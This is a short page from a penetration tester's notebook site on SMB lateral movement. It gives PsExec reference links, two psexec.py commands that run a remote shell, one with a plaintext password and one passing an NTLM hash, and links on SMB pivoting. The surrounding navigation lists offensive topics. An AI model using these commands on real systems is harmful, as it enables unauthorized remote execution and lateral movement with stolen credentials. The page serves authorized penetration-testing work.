Pentester's Promiscuous Notebook
Twitter
GitHub
Blog
Sponsor
Search
⌃
K
Links
README
⚒️ Pentest
C2
Infrastructure
AD
ACL Abuse
AD CS Abuse
ADIDNS Abuse
Attack Trusts
Attack RODCs
AV / EDR Evasion
Authentication Coercion
Credentials Harvesting
Discovery
DnsAdmins
Dominance
GPO Abuse
Kerberos
Key Credentials Abuse
LAPS
Lateral Movement
Overpass-the-Hash
Pass-the-Hash
Pass-the-Ticket
RDP
RPC
RunAs
SMB
SPN-jacking
WinRM / PSRemoting
WMI
LDAP
NTLM
Password Spraying
Post Exploitation
Pre-created Computers Abuse
PrivExchange
Privileges Abuse
RID Cycling
SCCM / MECM Abuse
SMB
RPC
Token Manipulation
User Hunt
WSUS
Zerologon
DevOps
DBMS
Authentication Brute Force
File Transfer
IPMI
Kiosk Breakout
Low-Hanging Fruits
LPE
Networks
NFS
Persistence
Pivoting
Post Exploitation
SNMP
SSH
TFTP
VNC
Misc
OSINT
Password Brute Force
Perimeter
Shells
Web
Wi-Fi
⚔️ Red Team
Basics
Cobalt Strike
Infrastructure
Malware Development
SE
⚙️ Admin
Git
Linux
Networking
Virtualization
Windows
Powered By
GitBook
Comment on page
SMB
Server Message Block
PsExec
https://www.contextis.com/us/blog/lateral-movement-a-deep-look-into-psexec
https://blog.openthreatresearch.com/ntobjectmanager_rpc_smb_scm
psexec.py
$ psexec.py snovvcrash:'Passw0rd!'@192.168.11.1
$ rlwrap -cAr psexec.py -hashes :fc525c9683e8fe067095ba2ddc971889 megacorp.local/
[email protected]
powershell
SMB Pivoting
https://habr.com/ru/articles/460659/
https://github.com/mis-team/rsockspipe
Last modified
6mo ago